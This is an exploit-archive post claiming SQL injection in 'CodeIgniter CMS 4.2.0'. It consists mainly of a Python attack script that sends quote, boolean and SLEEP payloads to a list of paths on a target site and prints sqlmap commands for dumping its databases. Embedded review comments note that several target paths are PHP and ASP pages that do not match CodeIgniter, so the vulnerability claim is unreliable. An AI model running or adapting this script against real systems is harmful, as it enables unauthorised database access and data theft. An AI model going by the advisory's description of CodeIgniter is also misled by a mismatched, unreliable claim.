=============================================================================================================================================
| # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.codeigniter.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/167893/

[+] Summary : multiple SQL Injection vulnerabilities in CodeIgniter CMS version 4.2.0. The vulnerabilities affect various endpoints and parameters, allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database. Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests.

[+] POC :

python poc.py

#!/usr/bin/env python3
"""
CodeIgniter CMS Version 4.2.0 SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in multiple parameters

Every check in this script is a response heuristic (error string, body
difference, elapsed time); none of them reads data out of the database.
All requests are plain GETs through one requests.Session, so a defender
sees the same User-Agent and a fixed set of paths with a trailing quote
in the access log.
"""

import requests
import sys
import urllib3
import time
from argparse import ArgumentParser

# Disable SSL warnings
# NOTE(review): every request below also passes verify=False, so TLS
# certificate validation is disabled for the whole session, not just the
# warning output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class CodeIgniterExploit:
    """Send quote / boolean / SLEEP probes to a fixed list of paths on one host.

    Holds the base URL and a requests.Session whose headers are set once in
    __init__ and reused by every probe.
    """

    def __init__(self, target):
        """Store the base URL and prepare the session.

        Args:
            target: Base URL of the host; a trailing "/" is stripped and the
                endpoint paths below are appended to it verbatim.
        """
        self.target = target.rstrip('/')
        self.session = requests.Session()
        # Static browser-like headers, identical on every request.
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive'
        })

    def check_vulnerability(self):
        """Check if target is vulnerable to SQL Injection

        Appends a single quote to each endpoint and reports the endpoint when
        the response body contains one of the database error strings below
        (case-insensitive substring match).  A match shows that the
        application returns a raw database error to the client; it does not
        by itself prove that the input reached a query.

        Returns:
            list[str]: endpoints whose response matched an error string.
        """
        print(f"[*] Checking vulnerability for: {self.target}")

        # Test multiple vulnerable endpoints
        # NOTE(review): several of these paths (.php, .asp, /employe/show.php)
        # do not look like CodeIgniter routes; confirm them against the
        # referenced advisory.  For "/login/" and the "/fa/FormView/..."
        # entries the quote is appended to the URL path, not to a parameter.
        endpoints = [
            "/Job/searchResult/?title=123",
            "/Job/searchResult/?title=test",
            "/search.php?search=1",
            "/news.php?p=7251",
            "/employe/show.php?cvid=14088",
            "/login/",
            "/fa/index.asp?p=search&search=1",
            "/fa/FormView/1026",
            "/fa/formview/1030"
        ]

        vulnerable_endpoints = []

        for endpoint in endpoints:
            # Test with single quote
            test_url = f"{self.target}{endpoint}'"

            try:
                response = self.session.get(test_url, timeout=10, verify=False)

                # Check for SQL error indicators
                # The substrings are short; "syntax error" in particular can
                # also occur in page text unrelated to a database, so a hit
                # here is a lead to verify, not a confirmed finding.
                error_indicators = [
                    "SQL syntax",
                    "mysql_fetch",
                    "mysql_num_rows",
                    "ODBC Driver",
                    "Unclosed quotation mark",
                    "syntax error",
                    "MySQL server",
                    "Warning: mysql",
                    "PostgreSQL",
                    "ORA-",
                    "Microsoft OLE DB"
                ]

                for error in error_indicators:
                    if error.lower() in response.text.lower():
                        print(f"[+] SQL Injection found in: {endpoint}")
                        vulnerable_endpoints.append(endpoint)
                        break  # one matching indicator per endpoint is enough

            except Exception as e:
                # Connection/timeout failures are printed and the endpoint is
                # skipped; they are not counted as vulnerable.
                print(f"[-] Error testing {endpoint}: {e}")
                continue

        return vulnerable_endpoints

    def exploit_boolean(self, endpoint):
        """Boolean-based blind SQL injection

        Requests the endpoint twice, once with a true and once with a false
        appended condition, and reports success when the two bodies differ
        in any way.  Pages whose content changes between requests (timestamps,
        nonces, CSRF tokens) will also produce differing bodies, so a True
        from this method is a weak signal on dynamic pages.

        Args:
            endpoint: Path (with query string) relative to self.target.

        Returns:
            bool: True when the two response bodies are not identical;
            False when they match or when either request raised.
        """
        print(f"[*] Testing boolean-based SQLi on: {endpoint}")

        # Test boolean conditions
        true_payload = f"{endpoint}' AND '1'='1"
        false_payload = f"{endpoint}' AND '1'='2"

        try:
            true_response = self.session.get(f"{self.target}{true_payload}", timeout=10, verify=False)
            false_response = self.session.get(f"{self.target}{false_payload}", timeout=10, verify=False)

            # Whole-body comparison; no normalisation of dynamic content.
            if true_response.text != false_response.text:
                print("[+] Boolean-based SQL Injection confirmed!")
                return True
        except Exception as e:
            print(f"[-] Boolean test failed: {e}")

        return False

    def exploit_time_based(self, endpoint):
        """Time-based blind SQL injection

        Appends a SLEEP(5) condition and measures the wall-clock time of the
        request.  Success is declared when the request took at least 5
        seconds; a slow or overloaded server trips the same threshold, and a
        request that exceeds the 10-second timeout raises and is reported as
        a failed test rather than a delay.

        Args:
            endpoint: Path (with query string) relative to self.target.

        Returns:
            bool: True when the measured round trip was >= 5 seconds,
            otherwise False.
        """
        print(f"[*] Testing time-based SQLi on: {endpoint}")

        time_payload = f"{endpoint}' AND SLEEP(5)--"

        try:
            start_time = time.time()
            # The response body is never inspected; only the elapsed time is.
            response = self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False)
            end_time = time.time()

            if end_time - start_time >= 5:
                print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                return True
        except Exception as e:
            print(f"[-] Time-based test failed: {e}")

        return False

    def generate_sqlmap_commands(self, endpoints):
        """Generate sqlmap commands for automated exploitation

        Prints five sqlmap command lines per endpoint to stdout.  Nothing is
        executed and no request is sent by this method.

        Args:
            endpoints: Paths relative to self.target, normally the list
                returned by check_vulnerability().
        """
        print("\n[+] SQLMap Commands:")
        print("=" * 60)

        for endpoint in endpoints:
            url = f"{self.target}{endpoint}"
            print(f"\n# For endpoint: {endpoint}")
            print(f'sqlmap -u "{url}" --batch --level=5 --risk=3')
            print(f'sqlmap -u "{url}" --batch --dbs')
            print(f'sqlmap -u "{url}" --batch --current-db')
            print(f'sqlmap -u "{url}" --batch --tables')
            print(f'sqlmap -u "{url}" --batch --dump-all')

    def comprehensive_scan(self):
        """Run comprehensive vulnerability scan

        Runs check_vulnerability(); returns early when it finds nothing.
        Otherwise runs the boolean and time-based probes against every
        reported endpoint (their True/False results are printed, not
        collected) and finally prints the sqlmap command list.
        """
        print("[*] Starting comprehensive CodeIgniter CMS scan...")

        # Check vulnerability
        vulnerable_endpoints = self.check_vulnerability()

        if not vulnerable_endpoints:
            print("[-] No SQL Injection vulnerabilities found")
            return

        print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints")

        # Test exploitation methods on each endpoint
        for endpoint in vulnerable_endpoints:
            print(f"\n[*] Testing exploitation methods for: {endpoint}")

            # Boolean-based
            self.exploit_boolean(endpoint)

            # Time-based
            self.exploit_time_based(endpoint)

        # Generate sqlmap commands
        self.generate_sqlmap_commands(vulnerable_endpoints)


def main():
    """Parse the command line and dispatch to one mode.

    Modes are checked in the order --check, --exploit, --sqlmap; the first
    flag present wins.  --exploit and the no-flag default both run
    comprehensive_scan().  -u/--url is required by argparse.
    """
    banner = """
 ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
 ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
 ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
 ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
 ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
 ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝

 CodeIgniter CMS 4.2.0 SQL Injection Exploit
 By: indoushka
 """
    print(banner)

    parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
    parser.add_argument('--check', action='store_true', help='Check vulnerability only')
    parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
    parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')

    args = parser.parse_args()

    exploit = CodeIgniterExploit(args.url)

    if args.check:
        # Error-string probe only; no boolean/time-based requests.
        vulnerable_endpoints = exploit.check_vulnerability()
        if vulnerable_endpoints:
            print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints")
        else:
            print("\n[!] Target does not appear to be vulnerable")
    elif args.exploit:
        exploit.comprehensive_scan()
    elif args.sqlmap:
        # Still runs the error-string probe first; commands are only printed
        # for endpoints it reported.
        vulnerable_endpoints = exploit.check_vulnerability()
        if vulnerable_endpoints:
            exploit.generate_sqlmap_commands(vulnerable_endpoints)
        else:
            print("[-] No vulnerable endpoints found for sqlmap")
    else:
        # Default: comprehensive scan
        exploit.comprehensive_scan()


if __name__ == "__main__":
    # With no arguments at all, print a short usage and exit 1 before
    # argparse gets a chance to complain about the missing -u.
    # NOTE(review): this usage text names codeigniter_exploit.py while the
    # advisory above invokes "python poc.py".
    if len(sys.argv) == 1:
        print("Usage: python codeigniter_exploit.py -u https://target.com")
        print("Options: --check, --exploit, --sqlmap")
        sys.exit(1)

    main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================